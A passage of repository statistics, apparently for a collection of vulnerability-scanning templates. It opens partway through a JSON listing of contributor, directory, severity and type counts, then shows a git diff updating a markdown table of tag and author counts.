nagli","count":2},{"name":"kiblyn11","count":2},{"name":"davidmckennirey","count":2},{"name":"hahwul","count":2},{"name":"0xprial","count":2},{"name":"hetroublemakr","count":2},{"name":"swissky","count":2},{"name":"dheerajmadhukar","count":2},{"name":"r3naissance","count":2},{"name":"cocxanh","count":2},{"name":"huowuzhao","count":2},{"name":"zomsop82","count":2},{"name":"johnjhacking","count":2},{"name":"mohammedsaneem","count":2},{"name":"vavkamil","count":2},{"name":"afaq","count":2},{"name":"bernardofsr","count":2},{"name":"bp0lr","count":2},{"name":"g4l1t0","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"moritz nentwig","count":2},{"name":"koti2","count":2},{"name":"alifathi-h1","count":2},{"name":"lotusdll","count":2},{"name":"0xelkomy","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"ehsahil","count":2},{"name":"0xrudra","count":2},{"name":"x1m_martijn","count":2},{"name":"udit_thakkur","count":2},{"name":"chron0x","count":1},{"name":"c3l3si4n","count":1},{"name":"xstp","count":1},{"name":"adrianmf","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"thevillagehacker","count":1},{"name":"ahmed sherif","count":1},{"name":"nytr0gen","count":1},{"name":"hanlaomo","count":1},{"name":"b0rn2r00t","count":1},{"name":"un-fmunozs","count":1},{"name":"co0nan","count":1},{"name":"elder tao","count":1},{"name":"intx0x80","count":1},{"name":"ohlinge","count":1},{"name":"ajaysenr","count":1},{"name":"revblock","count":1},{"name":"petruknisme","count":1},{"name":"fopina","count":1},{"name":"naglinagli","count":1},{"name":"yashanand155","count":1},{"name":"akshansh","count":1},{"name":"ahmetpergamum","count":1},{"name":"streetofhackerr007","count":1},{"name":"sickwell","count":1},{"name":"manuelbua","count":1},{"name":"j33n1k4","count":1},{"name":"borna nematzadeh","count":1},{"name":"0xrod","count":1},{"name":"ipanda","count":1},{"name":"exploitation","count":1},{"name":"alperenkesk","count":1},{"name":"me9187","count":1},{"name":"mass0ma","count":1},{"name":"push4d","count":1},{"name":"akash.c","count":1},{"name":"sec_hawk","count":1},{"name":"andysvints","count":1},{"name":"mhdsamx","count":1},{"name":"juicypotato1","count":1},{"name":"52971","count":1},{"name":"knassar702","count":1},{"name":"shifacyclewla","count":1},{"name":"daviey","count":1},{"name":"hakluke","count":1},{"name":"luskabol","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"mesaglio","count":1},{"name":"kurohost","count":1},{"name":"regala_","count":1},{"name":"mah3sec_","count":1},{"name":"geraldino2","count":1},{"name":"toufik airane","count":1},{"name":"shelld3v","count":1},{"name":"rojanrijal","count":1},{"name":"rodnt","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"cookiehanhoan","count":1},{"name":"absshax","count":1},{"name":"ilovebinbash","count":1},{"name":"willd96","count":1},{"name":"sullo","count":1},{"name":"divya_mudgal","count":1},{"name":"zandros0","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"b0yd","count":1},{"name":"luci","count":1},{"name":"ldionmarcil","count":1},{"name":"kre80r","count":1},{"name":"tirtha_mandal","count":1},{"name":"raesene","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"evolutionsec","count":1},{"name":"@dwisiswant0","count":1},{"name":"ooooooo_q","count":1},{"name":"schniggie","count":1},{"name":"_harleo","count":1},{"name":"yavolo","count":1},{"name":"notsoevilweasel","count":1},{"name":"makyotox","count":1},{"name":"apt-mirror","count":1},{"name":"th3.d1p4k","count":1},{"name":"wabafet","count":1},{"name":"shreyapohekar","count":1},{"name":"sicksec","count":1},{"name":"undefl0w","count":1},{"name":"pdp","count":1},{"name":"gboddin","count":1},{"name":"retr0","count":1},{"name":"rotemreiss","count":1},{"name":"whynotke","count":1},{"name":"sy3omda","count":1},{"name":"remonsec","count":1},{"name":"philippdelteil","count":1},{"name":"kareemse1im","count":1},{"name":"andirrahmani1","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"_darrenmartyn","count":1},{"name":"s1r1u5_","count":1},{"name":"jeya seelan","count":1},{"name":"noamrathaus","count":1},{"name":"brabbit10","count":1},{"name":"yashgoti","count":1},{"name":"0ut0fb4nd","count":1},{"name":"affix","count":1},{"name":"zhenwarx","count":1},{"name":"sshell","count":1},{"name":"taielab","count":1},{"name":"vzamanillo","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"0xteles","count":1},{"name":"elmahdi","count":1},{"name":"furkansenan","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"kabirsuda","count":1},{"name":"0xtavian","count":1},{"name":"alex","count":1},{"name":"ringo","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"pudsec","count":1},{"name":"infosecsanyam","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"udyz","count":1},{"name":"dawid-czarnecki","count":1},{"name":"becivells","count":1},{"name":"thezakman","count":1},{"name":"tim_koopmans","count":1},{"name":"mubassirpatel","count":1},{"name":"pratik khalane","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"flag007","count":1},{"name":"deena","count":1},{"name":"aresx","count":1},{"name":"its0x08","count":1},{"name":"b4uh0lz","count":1},{"name":"fmunozs","count":1},{"name":"bad5ect0r","count":1},{"name":"bolli95","count":1},{"name":"qlkwej","count":1},{"name":"micha3lb3n","count":1},{"name":"izn0u","count":1},{"name":"nerrorsec","count":1},{"name":"bjhulst","count":1},{"name":"defr0ggy","count":1},{"name":"d0rkerdevil","count":1},{"name":"jteles","count":1},{"name":"omarkurt","count":1},{"name":"iampritam","count":1},{"name":"patralos","count":1},{"name":"smaranchand","count":1},{"name":"soyelmago","count":1},{"name":"alph4byt3","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"0h1in9e","count":1},{"name":"_c0wb0y_","count":1},{"name":"x6263","count":1},{"name":"berkdusunur","count":1},{"name":"blckraven","count":1},{"name":"manikanta a.k.a @secureitmania","count":1}],"directory":[{"name":"cves","count":724},{"name":"vulnerabilities","count":299},{"name":"exposed-panels","count":248},{"name":"technologies","count":190},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":36},{"name":"network","count":32},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":642},{"name":"high","count":552},{"name":"medium","count":449},{"name":"critical","count":271},{"name":"low","count":152}],"types":[{"name":"http","count":1962},{"name":"file","count":46},{"name":"network","count":41},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index c038731d21..7f1155f4e9 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,6 +1,6 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 719 | pikpikcu | 273 | cves | 724 | info | 642 | http | 1962 | +| cve | 724 | pikpikcu | 273 | cves | 724 | info | 642 | http | 1962 | | lfi | 258 | dhiyaneshdk | 258 | vulnerabilities | 299 | high | 552 | file | 46 | | panel | 248 | daffainfo | 213 | exposed-panels | 248 | medium | 449 | network | 41 | | xss | 244 | pdteam | 196 | technologies | 190 | critical | 271 | dns | 12 | @@ -11,805 +11,805 @@ | cve2020 | 164 | princechaddha | 61 | file | 46 | | | | | | wp-plugin | 149 | madrobot | 61 | workflows | 36 | | | | | | cve2021 | 126 | gaurang | 42 | network | 32 | | | | | -| cve2019 | 95 | 0x_akoko | 37 | miscellaneous | 24 | | | | | +| cve2019 | 96 | 0x_akoko | 37 | miscellaneous | 24 | | | | | | config | 94 | ice3man | 26 | iot | 23 | | | | | -| cve2018 | 82 | philippedelteil | 25 | dns | 12 | | | | | +| cve2018 | 85 | philippedelteil | 25 | dns | 12 | | | | | | joomla | 79 | organiccrap | 24 | fuzzing | 10 | | | | | | apache | 70 | sheikhrishad | 15 | cnvd | 9 | | | | | | cve2010 | 69 | milo2012 | 14 | headless | 5 | | | | | | takeover | 68 | pr3r00t | 13 | | | | | | | | token | 65 | techbrunchfr | 13 | | | | | | | | default-login | 63 | suman_kar | 12 | | | | | | | -| iot | 62 | cyllective | 11 | | | | | | | -| oob | 53 | r3dg33k | 11 | | | | | | | -| cve2017 | 49 | random_robbie | 10 | | | | | | | +| iot | 62 | r3dg33k | 11 | | | | | | | +| oob | 53 | cyllective | 11 | | | | | | | +| cve2017 | 50 | wdahlenb | 10 | | | | | | | +| unauth | 46 | random_robbie | 10 | | | | | | | | file | 46 | righettod | 10 | | | | | | | -| unauth | 46 | wdahlenb | 10 | | | | | | | -| network | 41 | hackergautam | 9 | | | | | | | -| sqli | 38 | nadino | 9 | | | | | | | -| ssrf | 37 | melbadry9 | 9 | | | | | | | +| network | 41 | nadino | 9 | | | | | | | +| sqli | 38 | melbadry9 | 9 | | | | | | | +| ssrf | 37 | hackergautam | 9 | | | | | | | +| | 36 | aashiq | 8 | | | | | | | | oracle | 36 | that_juan_ | 8 | | | | | | | -| | 36 | iamthefrogy | 8 | | | | | | | -| cve2016 | 36 | aashiq | 8 | | | | | | | -| redirect | 33 | dr_set | 7 | | | | | | | +| cve2016 | 36 | iamthefrogy | 8 | | | | | | | +| redirect | 33 | emadshanab | 7 | | | | | | | | logs | 30 | techryptic (@tech) | 7 | | | | | | | | jira | 28 | 0x240x23elu | 7 | | | | | | | -| atlassian | 27 | dogasantos | 7 | | | | | | | -| listing | 27 | randomstr1ng | 7 | | | | | | | -| cve2015 | 23 | kophjager007 | 7 | | | | | | | -| misc | 23 | meme-lord | 7 | | | | | | | -| disclosure | 21 | emadshanab | 7 | | | | | | | -| generic | 20 | harshbothra_ | 7 | | | | | | | -| auth-bypass | 20 | oppsec | 7 | | | | | | | -| aem | 19 | pentest_swissky | 6 | | | | | | | -| cisco | 19 | caspergn | 6 | | | | | | | -| router | 19 | logicalhunter | 6 | | | | | | | -| debug | 18 | __fazal | 6 | | | | | | | -| misconfig | 18 | puzzlepeaches | 6 | | | | | | | +| listing | 27 | dr_set | 7 | | | | | | | +| atlassian | 27 | randomstr1ng | 7 | | | | | | | +| cve2015 | 23 | oppsec | 7 | | | | | | | +| misc | 23 | kophjager007 | 7 | | | | | | | +| disclosure | 21 | harshbothra_ | 7 | | | | | | | +| generic | 20 | dogasantos | 7 | | | | | | | +| auth-bypass | 20 | meme-lord | 7 | | | | | | | +| aem | 19 | __fazal | 6 | | | | | | | +| cisco | 19 | logicalhunter | 6 | | | | | | | +| router | 19 | pentest_swissky | 6 | | | | | | | +| debug | 18 | caspergn | 6 | | | | | | | +| sap | 18 | puzzlepeaches | 6 | | | | | | | +| cve2014 | 18 | ganofins | 5 | | | | | | | | springboot | 18 | iamnoooob | 5 | | | | | | | -| sap | 18 | yanyun | 5 | | | | | | | -| cve2014 | 18 | panch0r3d | 5 | | | | | | | -| php | 16 | elsfa7110 | 5 | | | | | | | -| weblogic | 14 | ganofins | 5 | | | | | | | -| cve2011 | 14 | rootxharsh | 5 | | | | | | | -| struts | 14 | joanbono | 5 | | | | | | | -| cve2012 | 14 | nodauf | 4 | | | | | | | -| fuzz | 14 | xelkomy | 4 | | | | | | | -| login | 14 | lu4nx | 4 | | | | | | | -| android | 13 | e_schultze_ | 4 | | | | | | | -| dns | 13 | github.com/its0x08 | 4 | | | | | | | -| adobe | 13 | yash anand @yashanand155 | 3 | | | | | | | -| zoho | 13 | emenalf | 3 | | | | | | | -| devops | 13 | fyoorer | 3 | | | | | | | -| jenkins | 12 | skeltavik | 3 | | | | | | | -| dlink | 12 | z3bd | 3 | | | | | | | +| misconfig | 18 | joanbono | 5 | | | | | | | +| php | 16 | rootxharsh | 5 | | | | | | | +| fuzz | 14 | elsfa7110 | 5 | | | | | | | +| cve2011 | 14 | panch0r3d | 5 | | | | | | | +| login | 14 | yanyun | 5 | | | | | | | +| cve2012 | 14 | e_schultze_ | 4 | | | | | | | +| struts | 14 | lu4nx | 4 | | | | | | | +| weblogic | 14 | github.com/its0x08 | 4 | | | | | | | +| android | 13 | xelkomy | 4 | | | | | | | +| dns | 13 | nodauf | 4 | | | | | | | +| zoho | 13 | unstabl3 | 3 | | | | | | | +| adobe | 13 | sushantkamble | 3 | | | | | | | +| devops | 13 | impramodsargar | 3 | | | | | | | | aws | 12 | shifacyclewala | 3 | | | | | | | -| wp-theme | 11 | dudez | 3 | | | | | | | -| cve2013 | 11 | tess | 3 | | | | | | | -| dell | 10 | mavericknerd | 3 | | | | | | | -| xxe | 10 | impramodsargar | 3 | | | | | | | -| magento | 9 | johnk3r | 3 | | | | | | | -| ftp | 9 | binaryfigments | 3 | | | | | | | -| intrusive | 9 | unstabl3 | 3 | | | | | | | -| rails | 8 | f1tz | 3 | | | | | | | -| cnvd | 8 | jarijaas | 3 | | | | | | | +| dlink | 12 | incogbyte | 3 | | | | | | | +| jenkins | 12 | johnk3r | 3 | | | | | | | +| wp-theme | 11 | shine | 3 | | | | | | | +| cve2013 | 11 | _generic_human_ | 3 | | | | | | | +| dell | 10 | vsh00t | 3 | | | | | | | +| xxe | 10 | idealphase | 3 | | | | | | | +| intrusive | 9 | skeltavik | 3 | | | | | | | +| magento | 9 | emenalf | 3 | | | | | | | +| ftp | 9 | fyoorer | 3 | | | | | | | +| scada | 8 | thomas_from_offensity | 3 | | | | | | | +| airflow | 8 | mavericknerd | 3 | | | | | | | +| gitlab | 8 | f1tz | 3 | | | | | | | +| cnvd | 8 | z3bd | 3 | | | | | | | +| ruijie | 8 | binaryfigments | 3 | | | | | | | | nginx | 8 | 0w4ys | 3 | | | | | | | -| gitlab | 8 | sushantkamble | 3 | | | | | | | -| ruijie | 8 | thomas_from_offensity | 3 | | | | | | | -| scada | 8 | shine | 3 | | | | | | | -| airflow | 8 | _generic_human_ | 3 | | | | | | | -| cve2009 | 7 | idealphase | 3 | | | | | | | -| ibm | 7 | vsh00t | 3 | | | | | | | -| vmware | 7 | incogbyte | 3 | | | | | | | -| netgear | 7 | lotusdll | 2 | | | | | | | -| confluence | 7 | dheerajmadhukar | 2 | | | | | | | -| coldfusion | 7 | davidmckennirey | 2 | | | | | | | -| files | 7 | zomsop82 | 2 | | | | | | | -| microsoft | 7 | r3naissance | 2 | | | | | | | -| kubernetes | 7 | bp0lr | 2 | | | | | | | -| google | 7 | gal nagli | 2 | | | | | | | -| backup | 7 | socketz | 2 | | | | | | | -| cms | 7 | manas_harsh | 2 | | | | | | | -| rconfig | 6 | bsysop | 2 | | | | | | | -| solr | 6 | mohammedsaneem | 2 | | | | | | | -| laravel | 6 | 0xrudra | 2 | | | | | | | -| docker | 6 | swissky | 2 | | | | | | | -| django | 6 | cocxanh | 2 | | | | | | | -| cve2008 | 6 | alifathi-h1 | 2 | | | | | | | -| api | 6 | huowuzhao | 2 | | | | | | | -| jetty | 6 | 0xsapra | 2 | | | | | | | -| citrix | 6 | random-robbie | 2 | | | | | | | -| drupal | 5 | gevakun | 2 | | | | | | | -| jolokia | 5 | foulenzer | 2 | | | | | | | -| phpmyadmin | 5 | arcc | 2 | | | | | | | -| lucee | 5 | joeldeleep | 2 | | | | | | | -| tomcat | 5 | parth | 2 | | | | | | | -| printer | 5 | bing0o | 2 | | | | | | | -| java | 5 | udit_thakkur | 2 | | | | | | | -| iis | 5 | amsda | 2 | | | | | | | -| dedecms | 5 | kiblyn11 | 2 | | | | | | | -| ssti | 5 | vavkamil | 2 | | | | | | | -| circarlife | 5 | w4cky_ | 2 | | | | | | | -| headless | 5 | whoever | 2 | | | | | | | -| deserialization | 5 | moritz nentwig | 2 | | | | | | | -| fileupload | 5 | x1m_martijn | 2 | | | | | | | -| nodejs | 5 | bernardofsr | 2 | | | | | | | -| windows | 5 | 0xprial | 2 | | | | | | | -| glpi | 4 | hahwul | 2 | | | | | | | -| samsung | 4 | afaq | 2 | | | | | | | -| hongdian | 4 | pxmme1337 | 2 | | | | | | | -| git | 4 | hetroublemakr | 2 | | | | | | | -| vpn | 4 | 0xsmiley | 2 | | | | | | | -| elastic | 4 | ree4pwn | 2 | | | | | | | -| moodle | 4 | fabaff | 2 | | | | | | | -| crlf | 4 | johnjhacking | 2 | | | | | | | -| strapi | 4 | 0xelkomy | 2 | | | | | | | -| hp | 4 | nkxxkn | 2 | | | | | | | -| zimbra | 4 | 0xcrypto | 2 | | | | | | | -| zabbix | 4 | koti2 | 2 | | | | | | | -| wso2 | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| artifactory | 4 | convisoappsec | 2 | | | | | | | -| webserver | 4 | g4l1t0 | 2 | | | | | | | -| solarwinds | 4 | ehsahil | 2 | | | | | | | -| thinkcmf | 4 | randomrobbie | 2 | | | | | | | -| grafana | 4 | ldionmarcil | 1 | | | | | | | -| magmi | 4 | deena | 1 | | | | | | | -| resin | 4 | kre80r | 1 | | | | | | | -| asp | 4 | izn0u | 1 | | | | | | | -| exchange | 4 | dawid-czarnecki | 1 | | | | | | | -| traversal | 4 | infosecsanyam | 1 | | | | | | | -| buffalo | 4 | sy3omda | 1 | | | | | | | -| proxy | 4 | j33n1k4 | 1 | | | | | | | -| firmware | 4 | bolli95 | 1 | | | | | | | -| thinkphp | 4 | push4d | 1 | | | | | | | -| symantec | 4 | philippdelteil | 1 | | | | | | | -| symfony | 4 | revblock | 1 | | | | | | | -| smtp | 3 | chron0x | 1 | | | | | | | -| bitrix | 3 | hakluke | 1 | | | | | | | -| mongodb | 3 | kurohost | 1 | | | | | | | -| nosqli | 3 | adrianmf | 1 | | | | | | | -| targa | 3 | ooooooo_q | 1 | | | | | | | -| itop | 3 | sullo | 1 | | | | | | | -| slack | 3 | qlkwej | 1 | | | | | | | -| telerik | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| rails | 8 | tess | 3 | | | | | | | +| ibm | 7 | jarijaas | 3 | | | | | | | +| kubernetes | 7 | yash anand @yashanand155 | 3 | | | | | | | +| google | 7 | dudez | 3 | | | | | | | +| microsoft | 7 | gal nagli | 2 | | | | | | | +| cve2009 | 7 | manas_harsh | 2 | | | | | | | +| cms | 7 | lotusdll | 2 | | | | | | | +| backup | 7 | moritz nentwig | 2 | | | | | | | +| files | 7 | g4l1t0 | 2 | | | | | | | +| confluence | 7 | vavkamil | 2 | | | | | | | +| coldfusion | 7 | cocxanh | 2 | | | | | | | +| vmware | 7 | udit_thakkur | 2 | | | | | | | +| netgear | 7 | r3naissance | 2 | | | | | | | +| citrix | 6 | w4cky_ | 2 | | | | | | | +| rconfig | 6 | fabaff | 2 | | | | | | | +| cve2008 | 6 | pxmme1337 | 2 | | | | | | | +| docker | 6 | 0xprial | 2 | | | | | | | +| laravel | 6 | hahwul | 2 | | | | | | | +| jetty | 6 | mohammedsaneem | 2 | | | | | | | +| api | 6 | gevakun | 2 | | | | | | | +| django | 6 | x1m_martijn | 2 | | | | | | | +| solr | 6 | whoever | 2 | | | | | | | +| ssti | 5 | 0xsapra | 2 | | | | | | | +| deserialization | 5 | bing0o | 2 | | | | | | | +| circarlife | 5 | socketz | 2 | | | | | | | +| tomcat | 5 | davidmckennirey | 2 | | | | | | | +| jolokia | 5 | amsda | 2 | | | | | | | +| drupal | 5 | 0xsmiley | 2 | | | | | | | +| java | 5 | afaq | 2 | | | | | | | +| phpmyadmin | 5 | 0xelkomy | 2 | | | | | | | +| fileupload | 5 | bp0lr | 2 | | | | | | | +| printer | 5 | zomsop82 | 2 | | | | | | | +| dedecms | 5 | random-robbie | 2 | | | | | | | +| windows | 5 | arcc | 2 | | | | | | | +| lucee | 5 | 0xcrypto | 2 | | | | | | | +| nodejs | 5 | huowuzhao | 2 | | | | | | | +| headless | 5 | alifathi-h1 | 2 | | | | | | | +| iis | 5 | 0xrudra | 2 | | | | | | | +| symfony | 4 | ree4pwn | 2 | | | | | | | +| samsung | 4 | nkxxkn | 2 | | | | | | | +| wso2 | 4 | ehsahil | 2 | | | | | | | +| thinkcmf | 4 | bernardofsr | 2 | | | | | | | +| git | 4 | joeldeleep | 2 | | | | | | | +| hp | 4 | convisoappsec | 2 | | | | | | | +| magmi | 4 | koti2 | 2 | | | | | | | +| firmware | 4 | foulenzer | 2 | | | | | | | +| proxy | 4 | swissky | 2 | | | | | | | +| moodle | 4 | bsysop | 2 | | | | | | | +| hongdian | 4 | hetroublemakr | 2 | | | | | | | +| glpi | 4 | dheerajmadhukar | 2 | | | | | | | +| solarwinds | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| elastic | 4 | kiblyn11 | 2 | | | | | | | +| artifactory | 4 | randomrobbie | 2 | | | | | | | +| crlf | 4 | parth | 2 | | | | | | | +| zimbra | 4 | johnjhacking | 2 | | | | | | | +| resin | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| npm | 3 | akash.c | 1 | | | | | | | -| nexus | 3 | mah3sec_ | 1 | | | | | | | -| cacti | 3 | andysvints | 1 | | | | | | | -| jellyfin | 3 | taielab | 1 | | | | | | | -| nacos | 3 | zhenwarx | 1 | | | | | | | -| kafka | 3 | 0ut0fb4nd | 1 | | | | | | | -| druid | 3 | elmahdi | 1 | | | | | | | -| ssh | 3 | flag007 | 1 | | | | | | | -| ebs | 3 | ohlinge | 1 | | | | | | | -| caucho | 3 | raesene | 1 | | | | | | | -| kevinlab | 3 | pratik khalane | 1 | | | | | | | -| injection | 3 | mesaglio | 1 | | | | | | | -| lfr | 3 | yashgoti | 1 | | | | | | | -| fpd | 3 | yavolo | 1 | | | | | | | -| firebase | 3 | zandros0 | 1 | | | | | | | -| zhiyuan | 3 | b0yd | 1 | | | | | | | -| prometheus | 3 | notsoevilweasel | 1 | | | | | | | -| httpd | 3 | aceseven (digisec360) | 1 | | | | | | | -| fanruan | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | -| log | 3 | shreyapohekar | 1 | | | | | | | -| kibana | 3 | ahmetpergamum | 1 | | | | | | | -| openssh | 3 | ilovebinbash | 1 | | | | | | | -| mail | 3 | shelld3v | 1 | | | | | | | -| microstrategy | 3 | noamrathaus | 1 | | | | | | | -| oa | 3 | iampritam | 1 | | | | | | | -| openam | 3 | aaron_costello | 1 | | | | | | | +| webserver | 4 | soyelmago | 1 | | | | | | | +| traversal | 4 | tirtha_mandal | 1 | | | | | | | +| zabbix | 4 | andirrahmani1 | 1 | | | | | | | +| grafana | 4 | kba@sogeti_esec | 1 | | | | | | | +| symantec | 4 | 0ut0fb4nd | 1 | | | | | | | +| buffalo | 4 | absshax | 1 | | | | | | | +| thinkphp | 4 | fmunozs | 1 | | | | | | | +| strapi | 4 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| asp | 4 | raesene | 1 | | | | | | | +| exchange | 4 | schniggie | 1 | | | | | | | +| vpn | 4 | b4uh0lz | 1 | | | | | | | +| r-seenet | 3 | 52971 | 1 | | | | | | | +| nexus | 3 | nytr0gen | 1 | | | | | | | +| mongodb | 3 | borna nematzadeh | 1 | | | | | | | +| ssh | 3 | undefl0w | 1 | | | | | | | +| jellyfin | 3 | pdp | 1 | | | | | | | +| targa | 3 | izn0u | 1 | | | | | | | +| slack | 3 | notsoevilweasel | 1 | | | | | | | +| fpd | 3 | un-fmunozs | 1 | | | | | | | +| smtp | 3 | remonsec | 1 | | | | | | | +| vbulletin | 3 | jeya seelan | 1 | | | | | | | +| prometheus | 3 | tim_koopmans | 1 | | | | | | | +| oa | 3 | alperenkesk | 1 | | | | | | | +| amazon | 3 | kabirsuda | 1 | | | | | | | +| bigip | 3 | geraldino2 | 1 | | | | | | | +| fanruan | 3 | knassar702 | 1 | | | | | | | +| linkerd | 3 | ahmetpergamum | 1 | | | | | | | +| lfr | 3 | omarkurt | 1 | | | | | | | +| nosqli | 3 | _harleo | 1 | | | | | | | +| jeesns | 3 | elmahdi | 1 | | | | | | | +| opensis | 3 | shifacyclewla | 1 | | | | | | | +| tikiwiki | 3 | c3l3si4n | 1 | | | | | | | +| ebs | 3 | mhdsamx | 1 | | | | | | | +| ofbiz | 3 | infosecsanyam | 1 | | | | | | | +| springcloud | 3 | elder tao | 1 | | | | | | | +| telerik | 3 | ldionmarcil | 1 | | | | | | | +| mail | 3 | qlkwej | 1 | | | | | | | +| caucho | 3 | iampritam | 1 | | | | | | | +| zhiyuan | 3 | ratnadip gajbhiye | 1 | | | | | | | +| injection | 3 | sicksec | 1 | | | | | | | +| bitrix | 3 | 0xteles | 1 | | | | | | | +| kibana | 3 | sshell | 1 | | | | | | | +| kafka | 3 | becivells | 1 | | | | | | | +| httpd | 3 | furkansenan | 1 | | | | | | | +| openam | 3 | alex | 1 | | | | | | | +| log | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | +| itop | 3 | ilovebinbash | 1 | | | | | | | +| nacos | 3 | toufik airane | 1 | | | | | | | +| terramaster | 3 | sullo | 1 | | | | | | | +| firebase | 3 | pratik khalane | 1 | | | | | | | +| druid | 3 | mass0ma | 1 | | | | | | | +| bypass | 3 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| bigip | 3 | wabafet | 1 | | | | | | | -| bypass | 3 | makyotox | 1 | | | | | | | -| tikiwiki | 3 | juicypotato1 | 1 | | | | | | | -| jeesns | 3 | tirtha_mandal | 1 | | | | | | | -| vbulletin | 3 | andirrahmani1 | 1 | | | | | | | -| terramaster | 3 | divya_mudgal | 1 | | | | | | | -| camera | 3 | intx0x80 | 1 | | | | | | | -| ofbiz | 3 | pdp | 1 | | | | | | | -| hoteldruid | 3 | rodnt | 1 | | | | | | | -| springcloud | 3 | c3l3si4n | 1 | | | | | | | -| backups | 3 | jteles | 1 | | | | | | | -| r-seenet | 3 | _darrenmartyn | 1 | | | | | | | -| linkerd | 3 | akshansh | 1 | | | | | | | -| opensis | 3 | thevillagehacker | 1 | | | | | | | -| amazon | 3 | borna nematzadeh | 1 | | | | | | | -| service | 2 | gboddin | 1 | | | | | | | -| oauth | 2 | _harleo | 1 | | | | | | | -| backdoor | 2 | cookiehanhoan | 1 | | | | | | | -| harbor | 2 | nerrorsec | 1 | | | | | | | -| manageengine | 2 | kba@sogeti_esec | 1 | | | | | | | -| keycloak | 2 | xstp | 1 | | | | | | | -| huawei | 2 | knassar702 | 1 | | | | | | | -| hasura | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| plesk | 2 | vzamanillo | 1 | | | | | | | -| storage | 2 | alex | 1 | | | | | | | -| liferay | 2 | d0rkerdevil | 1 | | | | | | | -| xxljob | 2 | 0h1in9e | 1 | | | | | | | -| saltstack | 2 | pudsec | 1 | | | | | | | -| adminer | 2 | streetofhackerr007 | 1 | | | | | | | -| sonicwall | 2 | becivells | 1 | | | | | | | -| yii | 2 | bernardo rodrigues | 1 | | | | | | | +| backups | 3 | push4d | 1 | | | | | | | +| openssh | 3 | ringo | 1 | | | | | | | +| kevinlab | 3 | alph4byt3 | 1 | | | | | | | +| hoteldruid | 3 | me9187 | 1 | | | | | | | +| microstrategy | 3 | bjhulst | 1 | | | | | | | +| cacti | 3 | co0nan | 1 | | | | | | | +| camera | 3 | ipanda | 1 | | | | | | | +| npm | 3 | udyz | 1 | | | | | | | +| shellshock | 2 | regala_ | 1 | | | | | | | +| kentico | 2 | zhenwarx | 1 | | | | | | | +| leak | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| qcubed | 2 | aresx | 1 | | | | | | | -| bucket | 2 | nytr0gen | 1 | | | | | | | -| bruteforce | 2 | elder tao | 1 | | | | | | | -| akamai | 2 | evolutionsec | 1 | | | | | | | -| cache | 2 | th3.d1p4k | 1 | | | | | | | -| aruba | 2 | hanlaomo | 1 | | | | | | | -| nextjs | 2 | affix | 1 | | | | | | | -| smb | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| globalprotect | 2 | soyelmago | 1 | | | | | | | -| cve2007 | 2 | blckraven | 1 | | | | | | | -| voipmonitor | 2 | alperenkesk | 1 | | | | | | | -| wordfence | 2 | manuelbua | 1 | | | | | | | -| vrealize | 2 | ajaysenr | 1 | | | | | | | -| ilo | 2 | regala_ | 1 | | | | | | | -| ecology | 2 | ipanda | 1 | | | | | | | -| webcam | 2 | un-fmunozs | 1 | | | | | | | -| nextcloud | 2 | udyz | 1 | | | | | | | -| ec2 | 2 | remonsec | 1 | | | | | | | -| github | 2 | b4uh0lz | 1 | | | | | | | -| hostheader-injection | 2 | apt-mirror | 1 | | | | | | | -| phpcollab | 2 | its0x08 | 1 | | | | | | | -| splunk | 2 | yashanand155 | 1 | | | | | | | -| hpe | 2 | sec_hawk | 1 | | | | | | | -| waf | 2 | micha3lb3n | 1 | | | | | | | -| node | 2 | omarkurt | 1 | | | | | | | -| maian | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| mcafee | 2 | furkansenan | 1 | | | | | | | -| igs | 2 | 52971 | 1 | | | | | | | -| grav | 2 | 0xtavian | 1 | | | | | | | -| sonarqube | 2 | petruknisme | 1 | | | | | | | -| emerge | 2 | defr0ggy | 1 | | | | | | | -| sharepoint | 2 | thezakman | 1 | | | | | | | -| idrac | 2 | @github.com/defr0ggy | 1 | | | | | | | -| chiyu | 2 | shifacyclewla | 1 | | | | | | | -| pega | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| icewarp | 2 | jeya seelan | 1 | | | | | | | -| glassfish | 2 | mubassirpatel | 1 | | | | | | | -| axis | 2 | willd96 | 1 | | | | | | | -| mida | 2 | sicksec | 1 | | | | 